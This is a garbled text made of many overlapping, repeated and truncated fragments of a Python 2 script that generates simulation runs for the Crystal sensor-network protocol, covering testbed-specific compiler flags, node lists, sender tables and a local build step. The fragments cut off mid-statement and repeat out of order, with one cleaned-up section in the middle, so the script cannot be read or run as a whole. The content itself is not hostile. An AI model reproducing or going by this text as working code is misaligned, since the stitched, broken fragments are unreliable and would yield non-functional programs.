full_epochs header = \" \".join(p.keys()) values = \" \".join([str(x) for x in", "\"-DNUM_ACTIVE_EPOCHS=%d\"%active_epochs, \"-DCRYSTAL_CONF_PERIOD=%f\"%period, \"-DN_TX_S=%d\"%n_tx_s, \"-DN_TX_T=%d\"%n_tx_t, \"-DN_TX_A=%d\"%n_tx_a, \"-DDUR_S_MS=%d\"%dur_s, \"-DDUR_T_MS=%d\"%dur_t, \"-DDUR_A_MS=%d\"%dur_a, \"-DCRYSTAL_SYNC_ACKS=%d\"%sync_ack, \"-DCRYSTAL_LONGSKIP=%d\"%longskip, \"-DCRYSTAL_PAYLOAD_LENGTH=%d\"%payload, \"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d\"%n_empty.r, \"-DCRYSTAL_MAX_SILENT_TAS=%d\"%n_empty.y,", "with open(\"nodelist.txt\") as f: for l in f: l = l.strip() if l:", "= args.basepath #apppath = os.path.join(basepath, \"apps\", \"glossy-test\") #apppath = os.path.join(basepath, \"apps\", \"ta\") apppath", "os.chdir(pwd) try: os.makedirs(simdir) except OSError,e: print e nodelist = os.path.join(simdir, \"nodelist.txt\") with open(nodelist,", "copy(abs_env_name, simdir) copy(abs_tbl_name, simdir) def mk_env(power, channel, sink, num_senders, longskip, n_empty, cca): cflags", "0 for (power, channel, sink, num_senders, longskip, n_empty, cca, nodemap) in itertools.product(powers, channels,", "= cca.dbm p[\"cca_cnt\"] = cca.counter p[\"payload\"] = payload p[\"chmap\"] = chmap p[\"boot_chop\"] =", "simnum += 1 except Exception, e: traceback.print_exc() if os.path.isdir(simdir): rmtree(simdir) raise e print", "if l: all_nodes.add(int(l.strip())) simnum = 0 for (power, channel, sink, num_senders, longskip, n_empty,", "p[\"n_empty\"] = n_empty.r p[\"n_empty.y\"] = n_empty.y p[\"n_empty.z\"] = n_empty.z p[\"n_empty.x\"] = n_empty.x p[\"nodemap\"]", "def set_defaults(dst, src): for k,v in src.items(): if k not in dst: dst[k]", "[\"-DTINYOS_NODE_ID=1\"] if testbed == \"indriya\": cflags += [\"-DSHORT_LOGS=1\"] if testbed == \"cooja\": cflags", "try: os.makedirs(simdir) except OSError,e: print e nodelist = os.path.join(simdir, \"nodelist.txt\") with open(nodelist, \"w\")", "start_epoch p[\"seed\"] = seed p[\"power\"] = power p[\"channel\"] = channel p[\"period\"] = 
period", "!= \"all\": copy(nodemap_txt, os.path.join(simdir, \"nodemap.txt\")) num_nodes = len(all_senders) with open(os.path.join(simdir, \"params_tbl.txt\"), \"w\") as", "f: l = l.strip() if l: nodes.remove(int(l.strip().split()[0])) if sink not in nodes: raise", "print \"using the following params\" print pars globals().update(pars) print \"--- Preparing simulations ------------------------\"", "os.path.join(basepath, \"apps\", \"glossy-test\") #apppath = os.path.join(basepath, \"apps\", \"ta\") apppath = os.path.join(basepath, \"apps\", \"crystal\")", "\"apps\", \"glossy-test\") #apppath = os.path.join(basepath, \"apps\", \"ta\") apppath = os.path.join(basepath, \"apps\", \"crystal\") sys.path", "random.seed(seed) for _ in xrange(num_epochs): tbl += rnd_unique(nodes, concurrent_txs) return \"static const uint8_t", "\"-DTX_POWER=%d\"%power, \"-DRF_CHANNEL=%d\"%channel, \"-DCRYSTAL_SINK_ID=%d\"%sink, \"-DSTART_EPOCH=%d\"%start_epoch, \"-DCONCURRENT_TXS=%d\"%num_senders, \"-DNUM_ACTIVE_EPOCHS=%d\"%active_epochs, \"-DCRYSTAL_CONF_PERIOD=%f\"%period, \"-DN_TX_S=%d\"%n_tx_s, \"-DN_TX_T=%d\"%n_tx_t, \"-DN_TX_A=%d\"%n_tx_a, \"-DDUR_S_MS=%d\"%dur_s, \"-DDUR_T_MS=%d\"%dur_t, \"-DDUR_A_MS=%d\"%dur_a,", "not in r: r.append(x) l += 1 return r def generate_table_array(nodes, num_epochs, concurrent_txs):", "if testbed == \"indriya\": cflags += [\"-DSHORT_LOGS=1\"] if testbed == \"cooja\": cflags +=", "!= \"all\": with open(nodemap_txt) as f: for l in f: l = l.strip()", "+= [\"-DTINYOS_SERIAL_FRAMES=1\"] if testbed in (\"indriya\", \"fbk\", \"flock\", \"twist\"): cflags += [\"-DTINYOS_NODE_ID=1\"] if", "in (\"indriya\", \"fbk\", \"twist\"): cflags += [\"-DTINYOS_SERIAL_FRAMES=1\"] if testbed in (\"indriya\", \"fbk\", \"flock\",", "cflags += [\"-DCOOJA=1\"] if testbed in (\"indriya\", \"fbk\"): cflags += [\"-DCRYSTAL_START_DELAY_SINK=40\", \"-DCRYSTAL_START_DELAY_NONSINK=20\"] else:", "= set() with open(\"nodelist.txt\") as f: for l in f: l = l.strip()", "l = l.strip() if l: 
nodes.remove(int(l.strip().split()[0])) if sink not in nodes: raise Exception(\"Sink", "mk_env(power, channel, sink, num_senders, longskip, n_empty, cca) prepare_binary(simdir, all_senders, active_epochs, num_senders, new_env) if", "p[\"start_epoch\"] = start_epoch p[\"seed\"] = seed p[\"power\"] = power p[\"channel\"] = channel p[\"period\"]", "\"all\": copy(nodemap_txt, os.path.join(simdir, \"nodemap.txt\")) num_nodes = len(all_senders) with open(os.path.join(simdir, \"params_tbl.txt\"), \"w\") as f:", "for _ in xrange(num_epochs): tbl += rnd_unique(nodes, concurrent_txs) return \"static const uint8_t sndtbl[]", "for l in f: l = l.strip() if l: nodes.remove(int(l.strip().split()[0])) if sink not", "n_empty, cca): cflags = [ \"-DTX_POWER=%d\"%power, \"-DRF_CHANNEL=%d\"%channel, \"-DCRYSTAL_SINK_ID=%d\"%sink, \"-DSTART_EPOCH=%d\"%start_epoch, \"-DCONCURRENT_TXS=%d\"%num_senders, \"-DNUM_ACTIVE_EPOCHS=%d\"%active_epochs, \"-DCRYSTAL_CONF_PERIOD=%f\"%period, \"-DN_TX_S=%d\"%n_tx_s,", "\"-DRF_CHANNEL=%d\"%channel, \"-DCRYSTAL_SINK_ID=%d\"%sink, \"-DSTART_EPOCH=%d\"%start_epoch, \"-DCONCURRENT_TXS=%d\"%num_senders, \"-DNUM_ACTIVE_EPOCHS=%d\"%active_epochs, \"-DCRYSTAL_CONF_PERIOD=%f\"%period, \"-DN_TX_S=%d\"%n_tx_s, \"-DN_TX_T=%d\"%n_tx_t, \"-DN_TX_A=%d\"%n_tx_a, \"-DDUR_S_MS=%d\"%dur_s, \"-DDUR_T_MS=%d\"%dur_t, \"-DDUR_A_MS=%d\"%dur_a, \"-DCRYSTAL_SYNC_ACKS=%d\"%sync_ack,", "values = \" \".join([str(x) for x in p.values()]) f.write(header) f.write(\"\\n\") f.write(values) f.write(\"\\n\") simnum", "traceback ap = argparse.ArgumentParser(description='Simulation generator') ap.add_argument('--basepath', required=False, default=\"../..\", help='Base path') ap.add_argument('-c', '--config', required=False,", "try: nodemap_txt = nodemap+\".txt\" if nodemap != \"all\" and not os.path.exists(nodemap_txt): raise Exception(\"Node", "= 0 r = [] while (l<n): x = random.choice(nodes) if x not", "globals().update(pars) print \"--- Preparing simulations ------------------------\" 
# Load the experiment configuration file: it populates `pars` with the
# parameter lists (powers, channels, sinks, ...) the main loop iterates.
glb = {}
pars = {}
execfile(params, glb, pars)

# Clear-channel assessment threshold: (power in dBm, sample counter).
CcaTuple = namedtuple("CcaTuple", "dbm counter")
# Termination thresholds, unpacked from the 4-tuples in `n_emptys`.
NemptyTuple = namedtuple("NemptyTuple", "r y z x")

# Fallbacks applied only for keys the config file did not set.
defaults = {
    "period": 2,
    "sync_ack": 1,
    "dyn_nempty": 0,
    #"n_emptys":[(2, 2, 4, 0)],
    "nodemaps": ["all"],
    "ccas": [(-32, 100)],
    "payload": 2,
    #"chmap":"nohop",
    #"boot_chop":"nohop",
    "logging": True,
    "seed": None,
}
set_defaults(pars, defaults)
print("using the following params")
print(pars)
# Make every configuration entry available as a module-level global.
globals().update(pars)

print("--- Preparing simulations ------------------------")

# Read the full testbed node list (one integer id per line).
all_nodes = set()
with open("nodelist.txt") as f:
    for l in f:
        l = l.strip()
        if l:
            all_nodes.add(int(l))
simnum = 0
def rnd_unique(nodes, n):
    """Draw *n* distinct elements from *nodes* by rejection sampling.

    Repeatedly calls random.choice and discards duplicates, so the
    result order follows the draw order.  Never terminates if *nodes*
    contains fewer than *n* distinct values.
    """
    picked = []
    while len(picked) < n:
        candidate = random.choice(nodes)
        if candidate not in picked:
            picked.append(candidate)
    return picked
def generate_table_array(nodes, num_epochs, concurrent_txs):
    """Render the per-epoch sender schedule as a C array literal.

    Produces num_epochs groups of concurrent_txs unique node ids each
    (re-seeding the RNG first when the module-level `seed` is not None,
    for reproducible schedules) and returns them flattened into a
    `static const uint8_t sndtbl[] = {...};` snippet.
    """
    if seed is not None:
        random.seed(seed)
    entries = []
    for _ in xrange(num_epochs):
        entries.extend(rnd_unique(nodes, concurrent_txs))
    body = ",".join(str(e) for e in entries)
    return "static const uint8_t sndtbl[] = {%s};" % body
p[\"n_tx_t\"] = n_tx_t p[\"n_tx_a\"] = n_tx_a p[\"dur_s\"]", "None: random.seed(seed) for _ in xrange(num_epochs): tbl += rnd_unique(nodes, concurrent_txs) return \"static const", "= testbed p[\"num_nodes\"] = num_nodes p[\"active_epochs\"] = active_epochs p[\"start_epoch\"] = start_epoch p[\"seed\"] =", "= cca.counter p[\"payload\"] = payload p[\"chmap\"] = chmap p[\"boot_chop\"] = boot_chop p[\"full_epochs\"] =", "\"-DDUR_T_MS=%d\"%dur_t, \"-DDUR_A_MS=%d\"%dur_a, \"-DCRYSTAL_SYNC_ACKS=%d\"%sync_ack, \"-DCRYSTAL_LONGSKIP=%d\"%longskip, \"-DCRYSTAL_PAYLOAD_LENGTH=%d\"%payload, \"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d\"%n_empty.r, \"-DCRYSTAL_MAX_SILENT_TAS=%d\"%n_empty.y, \"-DCRYSTAL_MAX_MISSING_ACKS=%d\"%n_empty.z, \"-DCRYSTAL_SINK_MAX_NOISY_TS=%d\"%n_empty.x, \"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty, \"-DCCA_THRESHOLD=%d\"%cca.dbm, \"-DCCA_COUNTER_THRESHOLD=%d\"%cca.counter, \"-DCHHOP_MAPPING=CHMAP_%s\"%chmap,", "src): for k,v in src.items(): if k not in dst: dst[k] = v", "= abs_bname + \".env\" with open(abs_tbl_name, \"w\") as f: f.write(generate_table_array(nodes, num_epochs, concurrent_txs)) pwd", "n_empty, cca, nodemap) in itertools.product(powers, channels, sinks, num_senderss, longskips, n_emptys, ccas, nodemaps): n_empty", "n_empty, cca) prepare_binary(simdir, all_senders, active_epochs, num_senders, new_env) if nodemap != \"all\": copy(nodemap_txt, os.path.join(simdir,", "longskip, payload, n_empty.r, n_empty.y, n_empty.z, n_empty.x, dyn_nempty, cca.dbm, cca.counter, full_epochs, testbed, nodemap, chmap,", "Exception(\"Sink node doesn't exist\") all_senders = [x for x in nodes if x!=sink]", "defaults) print \"using the following params\" print pars globals().update(pars) print \"--- Preparing simulations", "= n_empty.x p[\"nodemap\"] = nodemap p[\"cca\"] = cca.dbm p[\"cca_cnt\"] = cca.counter p[\"payload\"] =", "cflags += [\"-DCRYSTAL_START_DELAY_SINK=40\", \"-DCRYSTAL_START_DELAY_NONSINK=20\"] else: cflags += [\"-DCRYSTAL_START_DELAY_SINK=0\", 
\"-DCRYSTAL_START_DELAY_NONSINK=0\"] cflags = \" \".join(cflags)", "+= 1 return r def generate_table_array(nodes, num_epochs, concurrent_txs): tbl = [] if seed", "= n_empty.y p[\"n_empty.z\"] = n_empty.z p[\"n_empty.x\"] = n_empty.x p[\"nodemap\"] = nodemap p[\"cca\"] =", "n_empty.z, n_empty.x, dyn_nempty, cca.dbm, cca.counter, full_epochs, testbed, nodemap, chmap, boot_chop) if os.path.isdir(simdir): continue", "apppath = os.path.join(basepath, \"apps\", \"crystal\") sys.path += [\".\", os.path.join(basepath,\"test_tools\")] params = args.config def", "print \"--- Preparing simulations ------------------------\" all_nodes = set() with open(\"nodelist.txt\") as f: for", "\"all\": with open(nodemap_txt) as f: for l in f: l = l.strip() if", "k not in dst: dst[k] = v CcaTuple = namedtuple(\"CcaTuple\", \"dbm counter\") NemptyTuple", "n_empty.x p[\"nodemap\"] = nodemap p[\"cca\"] = cca.dbm p[\"cca_cnt\"] = cca.counter p[\"payload\"] = payload", "sink, num_senders, longskip, n_empty, cca, nodemap) in itertools.product(powers, channels, sinks, num_senderss, longskips, n_emptys,", "payload p[\"chmap\"] = chmap p[\"boot_chop\"] = boot_chop p[\"full_epochs\"] = full_epochs header = \"", "= \"crystal.sky\" def prepare_binary(simdir, nodes, num_epochs, concurrent_txs, new_env): env = os.environ.copy() env.update(new_env) abs_bname", "prepare_binary(simdir, nodes, num_epochs, concurrent_txs, new_env): env = os.environ.copy() env.update(new_env) abs_bname = os.path.join(apppath, binary_name)", "dst: dst[k] = v CcaTuple = namedtuple(\"CcaTuple\", \"dbm counter\") NemptyTuple = namedtuple(\"NemptyTuple\", \"r", "print e nodelist = os.path.join(simdir, \"nodelist.txt\") with open(nodelist, \"w\") as f: for n", "num_epochs, concurrent_txs, new_env): env = os.environ.copy() env.update(new_env) abs_bname = os.path.join(apppath, binary_name) abs_ihex_name =", "if k not in dst: dst[k] = v CcaTuple = namedtuple(\"CcaTuple\", \"dbm counter\")", "= dur_s p[\"dur_a\"] = dur_a p[\"dur_t\"] 
= dur_t p[\"sync_ack\"] = sync_ack p[\"longskip\"] =", "n_empty.y, n_empty.z, n_empty.x, dyn_nempty, cca.dbm, cca.counter, full_epochs, testbed, nodemap, chmap, boot_chop) if os.path.isdir(simdir):", "longskip, n_empty, cca) prepare_binary(simdir, all_senders, active_epochs, num_senders, new_env) if nodemap != \"all\": copy(nodemap_txt,", "= os.path.join(basepath, \"apps\", \"glossy-test\") #apppath = os.path.join(basepath, \"apps\", \"ta\") apppath = os.path.join(basepath, \"apps\",", "\"all\" and not os.path.exists(nodemap_txt): raise Exception(\"Node map file does not exist: \" +", "not in dst: dst[k] = v CcaTuple = namedtuple(\"CcaTuple\", \"dbm counter\") NemptyTuple =", "\"w\") as f: f.write(generate_table_array(nodes, num_epochs, concurrent_txs)) pwd = os.getcwd() os.chdir(apppath) subprocess.check_call([\"sh\",\"-c\",\"./build_simgen.sh\"], env=env) os.chdir(pwd)", "= sink p[\"n_tx_s\"] = n_tx_s p[\"n_tx_t\"] = n_tx_t p[\"n_tx_a\"] = n_tx_a p[\"dur_s\"] =", "nodemaps): n_empty = NemptyTuple(*n_empty) cca = CcaTuple(*cca) simdir = \"sink%03d_snd%02d_p%02d_c%02d_e%.2f_ns%02d_nt%02d_na%02d_ds%02d_dt%02d_da%02d_syna%d_ls%02d_pl%03d_r%02dy%02dz%02dx%02d_dyn%d_cca%d_%d_fe%02d_%s_%s_%s_B%s\"%(sink, num_senders, power, channel,", "seed p[\"power\"] = power p[\"channel\"] = channel p[\"period\"] = period p[\"senders\"] = num_senders", "cca.counter, full_epochs, testbed, nodemap, chmap, boot_chop) if os.path.isdir(simdir): continue try: nodemap_txt = nodemap+\".txt\"", "power, channel, period, n_tx_s, n_tx_t, n_tx_a, dur_s, dur_t, dur_a, sync_ack, longskip, payload, n_empty.r,", "channel, sink, num_senders, longskip, n_empty, cca, nodemap) in itertools.product(powers, channels, sinks, num_senderss, longskips,", "chmap p[\"boot_chop\"] = boot_chop p[\"full_epochs\"] = full_epochs header = \" \".join(p.keys()) values =", "cca.counter p[\"payload\"] = payload p[\"chmap\"] = chmap p[\"boot_chop\"] = boot_chop p[\"full_epochs\"] = full_epochs", "= start_epoch p[\"seed\"] 
= seed p[\"power\"] = power p[\"channel\"] = channel p[\"period\"] =", "\"apps\", \"ta\") apppath = os.path.join(basepath, \"apps\", \"crystal\") sys.path += [\".\", os.path.join(basepath,\"test_tools\")] params =", "namedtuple, OrderedDict from shutil import copy, rmtree import traceback import subprocess import itertools", "x in tbl]) binary_name = \"crystal.sky\" def prepare_binary(simdir, nodes, num_epochs, concurrent_txs, new_env): env", "\"-DCRYSTAL_PAYLOAD_LENGTH=%d\"%payload, \"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d\"%n_empty.r, \"-DCRYSTAL_MAX_SILENT_TAS=%d\"%n_empty.y, \"-DCRYSTAL_MAX_MISSING_ACKS=%d\"%n_empty.z, \"-DCRYSTAL_SINK_MAX_NOISY_TS=%d\"%n_empty.x, \"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty, \"-DCCA_THRESHOLD=%d\"%cca.dbm, \"-DCCA_COUNTER_THRESHOLD=%d\"%cca.counter, \"-DCHHOP_MAPPING=CHMAP_%s\"%chmap, \"-DBOOT_CHOPPING=BOOT_%s\"%boot_chop, \"-DN_FULL_EPOCHS=%d\"%full_epochs, ] if", "\".join(cflags) new_env = {\"CFLAGS\":cflags} return new_env glb = {} pars = {} execfile(params,", "= [x for x in nodes if x!=sink] new_env = mk_env(power, channel, sink,", "0)], \"nodemaps\":[\"all\"], \"ccas\":[(-32, 100)], \"payload\":2, #\"chmap\":\"nohop\", #\"boot_chop\":\"nohop\", \"logging\":True, \"seed\":None, } set_defaults(pars, defaults) print", "= {} pars = {} execfile(params, glb, pars) def set_defaults(dst, src): for k,v", "boot_chop p[\"full_epochs\"] = full_epochs header = \" \".join(p.keys()) values = \" \".join([str(x) for", "rnd_unique(nodes, concurrent_txs) return \"static const uint8_t sndtbl[] = {%s};\"%\",\".join([str(x) for x in tbl])", "= os.getcwd() os.chdir(apppath) subprocess.check_call([\"sh\",\"-c\",\"./build_simgen.sh\"], env=env) os.chdir(pwd) try: os.makedirs(simdir) except OSError,e: print e nodelist", "for l in f: l = l.strip() if l: all_nodes.add(int(l.strip())) simnum = 0", "doesn't exist\") all_senders = [x for x in nodes if x!=sink] new_env =", "pars) def set_defaults(dst, src): for k,v in src.items(): if k not in dst:", "new_env) 
if nodemap != \"all\": copy(nodemap_txt, os.path.join(simdir, \"nodemap.txt\")) num_nodes = len(all_senders) with open(os.path.join(simdir,", "concurrent_txs)) pwd = os.getcwd() os.chdir(apppath) subprocess.check_call([\"sh\",\"-c\",\"./build_simgen.sh\"], env=env) os.chdir(pwd) try: os.makedirs(simdir) except OSError,e: print", "p[\"channel\"] = channel p[\"period\"] = period p[\"senders\"] = num_senders p[\"sink\"] = sink p[\"n_tx_s\"]", "= n_tx_s p[\"n_tx_t\"] = n_tx_t p[\"n_tx_a\"] = n_tx_a p[\"dur_s\"] = dur_s p[\"dur_a\"] =", "glb, pars) def set_defaults(dst, src): for k,v in src.items(): if k not in", "if x not in r: r.append(x) l += 1 return r def generate_table_array(nodes,", "concurrent_txs): tbl = [] if seed is not None: random.seed(seed) for _ in", "num_senders, power, channel, period, n_tx_s, n_tx_t, n_tx_a, dur_s, dur_t, dur_a, sync_ack, longskip, payload,", "+= [\"-DCRYSTAL_START_DELAY_SINK=0\", \"-DCRYSTAL_START_DELAY_NONSINK=0\"] cflags = \" \".join(cflags) new_env = {\"CFLAGS\":cflags} return new_env glb", "p[\"payload\"] = payload p[\"chmap\"] = chmap p[\"boot_chop\"] = boot_chop p[\"full_epochs\"] = full_epochs header", "p[\"num_nodes\"] = num_nodes p[\"active_epochs\"] = active_epochs p[\"start_epoch\"] = start_epoch p[\"seed\"] = seed p[\"power\"]", "\"-DDUR_S_MS=%d\"%dur_s, \"-DDUR_T_MS=%d\"%dur_t, \"-DDUR_A_MS=%d\"%dur_a, \"-DCRYSTAL_SYNC_ACKS=%d\"%sync_ack, \"-DCRYSTAL_LONGSKIP=%d\"%longskip, \"-DCRYSTAL_PAYLOAD_LENGTH=%d\"%payload, \"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d\"%n_empty.r, \"-DCRYSTAL_MAX_SILENT_TAS=%d\"%n_empty.y, \"-DCRYSTAL_MAX_MISSING_ACKS=%d\"%n_empty.z, \"-DCRYSTAL_SINK_MAX_NOISY_TS=%d\"%n_empty.x, \"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty, \"-DCCA_THRESHOLD=%d\"%cca.dbm, \"-DCCA_COUNTER_THRESHOLD=%d\"%cca.counter,", "(power, channel, sink, num_senders, longskip, n_empty, cca, nodemap) in itertools.product(powers, channels, sinks, num_senderss,", "n_empty = NemptyTuple(*n_empty) cca = CcaTuple(*cca) simdir = 
\"sink%03d_snd%02d_p%02d_c%02d_e%.2f_ns%02d_nt%02d_na%02d_ds%02d_dt%02d_da%02d_syna%d_ls%02d_pl%03d_r%02dy%02dz%02dx%02d_dyn%d_cca%d_%d_fe%02d_%s_%s_%s_B%s\"%(sink, num_senders, power, channel, period,", "import itertools import re import random basepath = args.basepath #apppath = os.path.join(basepath, \"apps\",", "f.write(\"%d\\n\"%n) copy(abs_bname, simdir) copy(abs_ihex_name, simdir) copy(abs_env_name, simdir) copy(abs_tbl_name, simdir) def mk_env(power, channel, sink,", "python2.7 import sys import argparse import traceback ap = argparse.ArgumentParser(description='Simulation generator') ap.add_argument('--basepath', required=False,", "as f: for l in f: l = l.strip() if l: all_nodes.add(int(l.strip())) simnum", "power p[\"channel\"] = channel p[\"period\"] = period p[\"senders\"] = num_senders p[\"sink\"] = sink", "active_epochs p[\"start_epoch\"] = start_epoch p[\"seed\"] = seed p[\"power\"] = power p[\"channel\"] = channel", "= chmap p[\"boot_chop\"] = boot_chop p[\"full_epochs\"] = full_epochs header = \" \".join(p.keys()) values", "n_empty.z p[\"n_empty.x\"] = n_empty.x p[\"nodemap\"] = nodemap p[\"cca\"] = cca.dbm p[\"cca_cnt\"] = cca.counter", "cflags += [\"-DCRYSTAL_START_DELAY_SINK=0\", \"-DCRYSTAL_START_DELAY_NONSINK=0\"] cflags = \" \".join(cflags) new_env = {\"CFLAGS\":cflags} return new_env", "\"-DCRYSTAL_MAX_MISSING_ACKS=%d\"%n_empty.z, \"-DCRYSTAL_SINK_MAX_NOISY_TS=%d\"%n_empty.x, \"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty, \"-DCCA_THRESHOLD=%d\"%cca.dbm, \"-DCCA_COUNTER_THRESHOLD=%d\"%cca.counter, \"-DCHHOP_MAPPING=CHMAP_%s\"%chmap, \"-DBOOT_CHOPPING=BOOT_%s\"%boot_chop, \"-DN_FULL_EPOCHS=%d\"%full_epochs, ] if logging: cflags +=", "num_senders p[\"sink\"] = sink p[\"n_tx_s\"] = n_tx_s p[\"n_tx_t\"] = n_tx_t p[\"n_tx_a\"] = n_tx_a", "\"twist\"): cflags += [\"-DTINYOS_SERIAL_FRAMES=1\"] if testbed in (\"indriya\", \"fbk\", \"flock\", \"twist\"): cflags +=", "itertools.product(powers, channels, sinks, num_senderss, longskips, n_emptys, ccas, 
nodemaps): n_empty = NemptyTuple(*n_empty) cca =", "[] if seed is not None: random.seed(seed) for _ in xrange(num_epochs): tbl +=", "def prepare_binary(simdir, nodes, num_epochs, concurrent_txs, new_env): env = os.environ.copy() env.update(new_env) abs_bname = os.path.join(apppath,", "import subprocess import itertools import re import random basepath = args.basepath #apppath =", "for k,v in src.items(): if k not in dst: dst[k] = v CcaTuple", "sys import argparse import traceback ap = argparse.ArgumentParser(description='Simulation generator') ap.add_argument('--basepath', required=False, default=\"../..\", help='Base", "\"ta\") apppath = os.path.join(basepath, \"apps\", \"crystal\") sys.path += [\".\", os.path.join(basepath,\"test_tools\")] params = args.config", "subprocess import itertools import re import random basepath = args.basepath #apppath = os.path.join(basepath,", "p[\"nodemap\"] = nodemap p[\"cca\"] = cca.dbm p[\"cca_cnt\"] = cca.counter p[\"payload\"] = payload p[\"chmap\"]", "\"-DCRYSTAL_SINK_ID=%d\"%sink, \"-DSTART_EPOCH=%d\"%start_epoch, \"-DCONCURRENT_TXS=%d\"%num_senders, \"-DNUM_ACTIVE_EPOCHS=%d\"%active_epochs, \"-DCRYSTAL_CONF_PERIOD=%f\"%period, \"-DN_TX_S=%d\"%n_tx_s, \"-DN_TX_T=%d\"%n_tx_t, \"-DN_TX_A=%d\"%n_tx_a, \"-DDUR_S_MS=%d\"%dur_s, \"-DDUR_T_MS=%d\"%dur_t, \"-DDUR_A_MS=%d\"%dur_a, \"-DCRYSTAL_SYNC_ACKS=%d\"%sync_ack, \"-DCRYSTAL_LONGSKIP=%d\"%longskip,", "= os.path.join(simdir, \"nodelist.txt\") with open(nodelist, \"w\") as f: for n in nodes: f.write(\"%d\\n\"%n)", "os.path.join(basepath, \"apps\", \"ta\") apppath = os.path.join(basepath, \"apps\", \"crystal\") sys.path += [\".\", os.path.join(basepath,\"test_tools\")] params", "open(abs_tbl_name, \"w\") as f: f.write(generate_table_array(nodes, num_epochs, concurrent_txs)) pwd = os.getcwd() os.chdir(apppath) subprocess.check_call([\"sh\",\"-c\",\"./build_simgen.sh\"], env=env)", "in (\"indriya\", \"fbk\"): cflags += [\"-DCRYSTAL_START_DELAY_SINK=40\", 
\"-DCRYSTAL_START_DELAY_NONSINK=20\"] else: cflags += [\"-DCRYSTAL_START_DELAY_SINK=0\", \"-DCRYSTAL_START_DELAY_NONSINK=0\"] cflags", "n): l = 0 r = [] while (l<n): x = random.choice(nodes) if", "nodemap p[\"cca\"] = cca.dbm p[\"cca_cnt\"] = cca.counter p[\"payload\"] = payload p[\"chmap\"] = chmap", "sink, num_senders, longskip, n_empty, cca) prepare_binary(simdir, all_senders, active_epochs, num_senders, new_env) if nodemap !=", "binary_name) abs_ihex_name = abs_bname + \".ihex\" abs_tbl_name = os.path.join(apppath, \"sndtbl.c\") abs_env_name = abs_bname", "= abs_bname + \".ihex\" abs_tbl_name = os.path.join(apppath, \"sndtbl.c\") abs_env_name = abs_bname + \".env\"", "l.strip() if l: all_nodes.add(int(l.strip())) simnum = 0 for (power, channel, sink, num_senders, longskip,", "p[\"dur_s\"] = dur_s p[\"dur_a\"] = dur_a p[\"dur_t\"] = dur_t p[\"sync_ack\"] = sync_ack p[\"longskip\"]", "in f: l = l.strip() if l: all_nodes.add(int(l.strip())) simnum = 0 for (power,", "new_env = {\"CFLAGS\":cflags} return new_env glb = {} pars = {} execfile(params, glb,", "execfile(params, glb, pars) def set_defaults(dst, src): for k,v in src.items(): if k not", "cflags += [\"-DDISABLE_UART=1\"] if testbed in (\"indriya\", \"fbk\", \"twist\"): cflags += [\"-DTINYOS_SERIAL_FRAMES=1\"] if", "n_tx_s, n_tx_t, n_tx_a, dur_s, dur_t, dur_a, sync_ack, longskip, payload, n_empty.r, n_empty.y, n_empty.z, n_empty.x,", "abs_bname + \".ihex\" abs_tbl_name = os.path.join(apppath, \"sndtbl.c\") abs_env_name = abs_bname + \".env\" with", "for x in nodes if x!=sink] new_env = mk_env(power, channel, sink, num_senders, longskip,", "sink, num_senders, longskip, n_empty, cca): cflags = [ \"-DTX_POWER=%d\"%power, \"-DRF_CHANNEL=%d\"%channel, \"-DCRYSTAL_SINK_ID=%d\"%sink, \"-DSTART_EPOCH=%d\"%start_epoch, \"-DCONCURRENT_TXS=%d\"%num_senders,", "ap.add_argument('-c', '--config', required=False, default=\"params.py\", help='Configuration python file') args = ap.parse_args() import os from", "for (power, 
channel, sink, num_senders, longskip, n_empty, cca, nodemap) in itertools.product(powers, channels, sinks,", "required=False, default=\"params.py\", help='Configuration python file') args = ap.parse_args() import os from collections import", "\"apps\", \"crystal\") sys.path += [\".\", os.path.join(basepath,\"test_tools\")] params = args.config def rnd_unique(nodes, n): l", "rmtree import traceback import subprocess import itertools import re import random basepath =", "= set(all_nodes) if nodemap != \"all\": with open(nodemap_txt) as f: for l in", "counter\") NemptyTuple = namedtuple(\"NemptyTuple\", \"r y z x\") defaults = { \"period\":2, \"sync_ack\":1,", "\"seed\":None, } set_defaults(pars, defaults) print \"using the following params\" print pars globals().update(pars) print", "tbl = [] if seed is not None: random.seed(seed) for _ in xrange(num_epochs):", "= os.path.join(apppath, \"sndtbl.c\") abs_env_name = abs_bname + \".env\" with open(abs_tbl_name, \"w\") as f:", "raise Exception(\"Node map file does not exist: \" + nodemap_txt) nodes = set(all_nodes)", "abs_env_name = abs_bname + \".env\" with open(abs_tbl_name, \"w\") as f: f.write(generate_table_array(nodes, num_epochs, concurrent_txs))", "exist: \" + nodemap_txt) nodes = set(all_nodes) if nodemap != \"all\": with open(nodemap_txt)", "z x\") defaults = { \"period\":2, \"sync_ack\":1, \"dyn_nempty\":0, #\"n_emptys\":[(2, 2, 4, 0)], \"nodemaps\":[\"all\"],", "testbed p[\"num_nodes\"] = num_nodes p[\"active_epochs\"] = active_epochs p[\"start_epoch\"] = start_epoch p[\"seed\"] = seed", "+= [\"-DTINYOS_NODE_ID=1\"] if testbed == \"indriya\": cflags += [\"-DSHORT_LOGS=1\"] if testbed == \"cooja\":", "\" + nodemap_txt) nodes = set(all_nodes) if nodemap != \"all\": with open(nodemap_txt) as", "= channel p[\"period\"] = period p[\"senders\"] = num_senders p[\"sink\"] = sink p[\"n_tx_s\"] =", "nodemap_txt) nodes = set(all_nodes) if nodemap != \"all\": with open(nodemap_txt) as f: for", "tbl]) binary_name = 
